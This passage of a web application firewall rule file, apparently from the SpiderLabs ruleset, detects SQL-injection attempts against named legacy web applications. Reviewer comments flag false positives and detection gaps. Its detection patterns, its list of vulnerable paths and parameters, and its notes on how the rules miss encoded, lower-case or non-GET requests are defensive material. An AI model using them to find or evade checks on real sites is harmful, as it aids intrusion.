CreateAuction SQL Injection Attempt -- cats.asp catid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21929'" SecRule &TX:'/SQL_INJECTION.*ARGS:catid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CreateAuction SQL Injection Attempt -- cats.asp catid 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004040) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CubeCart SQL Injection Attempt -- cart.inc.php UPDATE
# Two-link chain evaluated in phase 2. Link 1 carries the id, severity, msg and the
# `block` action, and matches when REQUEST_LINE (after urlDecodeUni, htmlEntityDecode
# and normalisePathWin) contains "/cart.inc.php".
# NOTE(review): REQUEST_LINE holds the method, the URI with its query string, and the
# protocol, so this substring test is also satisfied when the path text appears inside
# a parameter value. A test on the request path alone would be tighter - verify before
# relying on this rule to identify the application.
SecRule REQUEST_LINE "@contains /cart.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004040,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS CubeCart SQL Injection Attempt -- cart.inc.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469301/100/0/threaded'"
    # Link 2: case-insensitive "UPDATE", one or more characters, then "SET", anywhere in
    # the query string or request body. On match it adds audit log part E, sets tx.msg,
    # adds tx.critical_anomaly_score to tx.anomaly_score and records the matched value
    # under tx.<rule id>-WEB_ATTACK/SQL_INJECTION-<matched variable name>.
    # NOTE(review): the pattern has no word boundaries, so benign input such as the
    # constructed query string "action=update&preset=1" also matches - expect false
    # positives on pages that legitimately carry "update" and "...set" in parameters.
    # NOTE(review): this link lists no t: actions and QUERY_STRING is not URL-decoded on
    # its own, so whether encoded input is normalised before the regex runs depends on
    # what the link inherits from SecDefaultAction - TODO confirm.
    SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CubeCart SQL Injection Attempt -- cart.inc.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2010275) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DEDECMS feedback_js.php arcurl Parameter UPDATE SET SQL Injection Attempt
# Three-link chain: path substring, the literal "GET " in the request line, and at
# least one TX variable whose name matches /SQL_INJECTION.*ARGS:arcurl/.
# NOTE(review): the title says "UPDATE SET", but no link shown here tests for either
# keyword; the chain fires on any SQL-injection marker recorded for the parameter.
SecRule REQUEST_LINE "@contains /plus/feedback_js.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010275,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS DEDECMS feedback_js.php arcurl Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/dedecms-sql.txt'"
    # NOTE(review): this link limits the rule to request lines containing "GET "; the
    # same parameter submitted with another method is not covered by this rule.
    # Presumably carried over from the original signature - verify that is intended.
    SecRule REQUEST_LINE "@contains GET " "chain"
    # `&TX:'/regex/'` counts the TX variables whose name matches; "@gt 0" is true when
    # at least one exists. Presumably those variables are written by the generic SQL
    # injection rules of the rule set (the naming matches the setvar below), so this
    # rule only fires if they are loaded and have already run - TODO confirm ordering.
    SecRule &TX:'/SQL_INJECTION.*ARGS:arcurl/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DEDECMS feedback_js.php arcurl Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004088) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DGNews SQL Injection Attempt -- news.php catid UPDATE
SecRule 
REQUEST_LINE "@contains /news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004088,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS DGNews SQL Injection Attempt -- news.php catid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24201'" SecRule &TX:'/SQL_INJECTION.*ARGS:catid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DGNews SQL Injection Attempt -- news.php catid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004461) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DGNews SQL Injection Attempt -- news.php newsid UPDATE SecRule REQUEST_LINE "@contains /news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004461,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DGNews SQL Injection Attempt -- news.php newsid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24212'" SecRule &TX:'/SQL_INJECTION.*ARGS:newsid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DGNews SQL Injection Attempt -- news.php newsid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004688) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DMXReady Site Engine Manager SQL Injection Attempt -- index.asp mid UPDATE SecRule REQUEST_LINE "@contains /index.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004688,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DMXReady Site Engine Manager SQL Injection Attempt -- index.asp mid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21064'" SecRule &TX:'/SQL_INJECTION.*ARGS:mid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET 
WEB_SPECIFIC_APPS DMXReady Site Engine Manager SQL Injection Attempt -- index.asp mid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006086) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- set_preferences.asp UPDATE SecRule REQUEST_LINE "@contains /set_preferences.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006086,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- set_preferences.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21788'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- set_preferences.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006092) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- send_password_preferences.asp UPDATE SecRule REQUEST_LINE "@contains /send_password_preferences.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006092,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- send_password_preferences.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21788'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- send_password_preferences.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" 
# (2006098) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- list.asp UPDATE
# Two-link chain evaluated in phase 2. Link 1 carries the id, severity, msg and the
# `block` action, and matches when REQUEST_LINE (after urlDecodeUni, htmlEntityDecode
# and normalisePathWin) contains "/SecureLoginManager/list.asp".
SecRule REQUEST_LINE "@contains /SecureLoginManager/list.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006098,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- list.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21788'"
    # Link 2: case-insensitive "UPDATE", one or more characters, then "SET", anywhere in
    # the query string or request body. On match it adds audit log part E, sets tx.msg
    # and adds tx.critical_anomaly_score to tx.anomaly_score.
    # NOTE(review): no word boundaries, so a benign request such as the constructed
    # query string "mode=update&offset=10" also matches; tune or add boundaries if this
    # page legitimately receives such parameters.
    # NOTE(review): this link lists no t: actions and QUERY_STRING is not URL-decoded on
    # its own; whether encoded input is normalised first depends on the transformations
    # inherited from SecDefaultAction - TODO confirm.
    SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- list.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006104) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- login.asp sent UPDATE
# Two-link chain: path substring, then at least one TX variable whose name matches
# /SQL_INJECTION.*ARGS:sent/.
# NOTE(review): "/login.asp" is a very common file name and REQUEST_LINE includes the
# query string, so link 1 does not by itself identify this product; any application
# with a login.asp page and a parameter starting with "sent" can trigger the rule.
# NOTE(review): the title says "UPDATE", but no link shown here tests for the keyword.
SecRule REQUEST_LINE "@contains /login.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006104,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- login.asp sent UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21788'"
    # `&TX:'/regex/'` counts matching TX variable names; "@gt 0" needs at least one.
    # Presumably those variables come from the generic SQL injection rules of the rule
    # set, so this rule depends on them being loaded and evaluated first - TODO confirm.
    # NOTE(review): the name regex is not anchored at the end, so it also matches
    # markers for longer parameter names that merely begin with "sent".
    SecRule &TX:'/SQL_INJECTION.*ARGS:sent/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- login.asp sent UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006110) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- content.asp sent UPDATE
SecRule REQUEST_LINE "@contains /content.asp" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006110,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- content.asp sent UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21788'" SecRule &TX:'/SQL_INJECTION.*ARGS:sent/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- content.asp sent UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006116) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- members.asp sent UPDATE SecRule REQUEST_LINE "@contains /members.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006116,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- members.asp sent UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21788'" SecRule &TX:'/SQL_INJECTION.*ARGS:sent/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- members.asp sent UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006122) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- inc_secureloginmanager.asp sent UPDATE SecRule REQUEST_LINE "@contains /applications/SecureLoginManager/inc_secureloginmanager.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006122,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- inc_secureloginmanager.asp 
sent UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21788'" SecRule &TX:'/SQL_INJECTION.*ARGS:sent/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- inc_secureloginmanager.asp sent UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005900) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Digitizing Quote And Ordering System SQL Injection Attempt -- search.asp ordernum UPDATE SecRule REQUEST_LINE "@contains /search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005900,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Digitizing Quote And Ordering System SQL Injection Attempt -- search.asp ordernum UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3089'" SecRule &TX:'/SQL_INJECTION.*ARGS:ordernum/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Digitizing Quote And Ordering System SQL Injection Attempt -- search.asp ordernum UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004839) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Design4Online UserPages2 SQL Injection Attempt -- page.asp art_id UPDATE SecRule REQUEST_LINE "@contains /page.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004839,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Design4Online UserPages2 SQL Injection Attempt -- page.asp art_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22636'" SecRule &TX:'/SQL_INJECTION.*ARGS:art_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Design4Online UserPages2 SQL Injection Attempt -- page.asp art_id 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005596) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Digiappz DigiAffiliate SQL Injection Attempt -- visu_user.asp id UPDATE SecRule REQUEST_LINE "@contains /visu_user.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005596,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Digiappz DigiAffiliate SQL Injection Attempt -- visu_user.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3122'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Digiappz DigiAffiliate SQL Injection Attempt -- visu_user.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005840) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Digirez SQL Injection Attempt -- info_book.asp book_id UPDATE SecRule REQUEST_LINE "@contains /info_book.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005840,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Digirez SQL Injection Attempt -- info_book.asp book_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3081'" SecRule &TX:'/SQL_INJECTION.*ARGS:book_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Digirez SQL Injection Attempt -- info_book.asp book_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010073) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Docebo UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010073,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Docebo UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/507072'"
    # Remaining links of rule 2010073. The two REQUEST_LINE links are plain substring
    # tests and list no t: actions of their own.
    SecRule REQUEST_LINE "@contains /docebo/docebo" "chain"
    # NOTE(review): @contains compares case-sensitively, so this link is satisfied only
    # by the upper-case keyword as it appears after whatever transformations the link
    # inherits. SQL keywords are case-insensitive; a lower-case operand with t:lowercase,
    # or a case-insensitive @rx, would remove that dependency - verify against the
    # rule set defaults before changing.
    SecRule REQUEST_LINE "@contains UPDATE" "chain"
    # Final link: at least one TX variable whose name matches
    # /SQL_INJECTION.*ARGS:modname/ (presumably written by the generic SQL injection
    # rules - TODO confirm they run first). On match it adds audit log part E, sets
    # tx.msg and adds tx.critical_anomaly_score to tx.anomaly_score.
    SecRule &TX:'/SQL_INJECTION.*ARGS:modname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Docebo UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2010078) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Docebo UPDATE SET SQL Injection Attempt
# Five-link chain: "/index.php", "/docebo/docebo", "UPDATE" and "SET" substrings in
# REQUEST_LINE, then a TX marker for the modname parameter.
# NOTE(review): the links shown for rule 2010073 are the same as this chain minus the
# "SET" test, and the msg text is identical. A request that satisfies this chain
# therefore also satisfies those links, both rules add tx.critical_anomaly_score, and
# the two alerts can be told apart only by id. Confirm the double scoring is intended.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010078,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Docebo UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/507072'"
    SecRule REQUEST_LINE "@contains /docebo/docebo" "chain"
    # Case-sensitive substring tests (see the t:lowercase / @rx option for keyword
    # matching); "SET" is also satisfied by longer upper-case tokens such as the
    # constructed examples "OFFSET" or "RESET".
    SecRule REQUEST_LINE "@contains UPDATE" "chain"
    SecRule REQUEST_LINE "@contains SET" "chain"
    # Final link: same TX-marker count test and scoring actions as rule 2010073.
    SecRule &TX:'/SQL_INJECTION.*ARGS:modname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Docebo UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004052) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dokeos SQL Injection Attempt -- courseLog.php scormcontopen UPDATE
SecRule REQUEST_LINE "@contains /tracking/courseLog.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004052,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Dokeos SQL Injection 
Attempt -- courseLog.php scormcontopen UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3980'" SecRule &TX:'/SQL_INJECTION.*ARGS:scormcontopen/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dokeos SQL Injection Attempt -- courseLog.php scormcontopen UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004070) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dokeos SQL Injection Attempt -- my_progress.php course UPDATE SecRule REQUEST_LINE "@contains /main/auth/my_progress.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004070,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Dokeos SQL Injection Attempt -- my_progress.php course UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3974'" SecRule &TX:'/SQL_INJECTION.*ARGS:course/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dokeos SQL Injection Attempt -- my_progress.php course UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006146) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dragon Business Directory SQL Injection Attempt -- bus_details.asp ID UPDATE SecRule REQUEST_LINE "@contains /bus_details.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006146,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Dragon Business Directory SQL Injection Attempt -- bus_details.asp ID UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2992'" SecRule &TX:'/SQL_INJECTION.*ARGS:ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dragon Business Directory SQL Injection Attempt -- bus_details.asp ID 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004390) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS fystyq Duyuru Scripti SQL Injection Attempt -- goster.asp id UPDATE SecRule REQUEST_LINE "@contains /goster.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004390,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS fystyq Duyuru Scripti SQL Injection Attempt -- goster.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22910'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS fystyq Duyuru Scripti SQL Injection Attempt -- goster.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006692) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DUware DUdownload SQL Injection Attempt -- detail.asp iFile UPDATE SecRule REQUEST_LINE "@contains /detail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006692,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS DUware DUdownload SQL Injection Attempt -- detail.asp iFile UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21405'" SecRule &TX:'/SQL_INJECTION.*ARGS:iFile/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DUware DUdownload SQL Injection Attempt -- detail.asp iFile UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006699) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DUware DUdownload SQL Injection Attempt -- detail.asp action UPDATE SecRule REQUEST_LINE "@contains /detail.asp" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006699,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS DUware DUdownload SQL Injection Attempt -- detail.asp action UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21405'" SecRule &TX:'/SQL_INJECTION.*ARGS:action/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DUware DUdownload SQL Injection Attempt -- detail.asp action UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006705) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DUware DUpaypal SQL Injection Attempt -- detail.asp iType UPDATE SecRule REQUEST_LINE "@contains /detail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006705,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS DUware DUpaypal SQL Injection Attempt -- detail.asp iType UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/14034'" SecRule &TX:'/SQL_INJECTION.*ARGS:iType/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DUware DUpaypal SQL Injection Attempt -- detail.asp iType UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006711) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DuWare DuClassmate SQL Injection Attempt -- default.asp iCity UPDATE SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006711,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS DuWare DuClassmate SQL Injection Attempt -- default.asp iCity UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/453318/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:iCity/' 
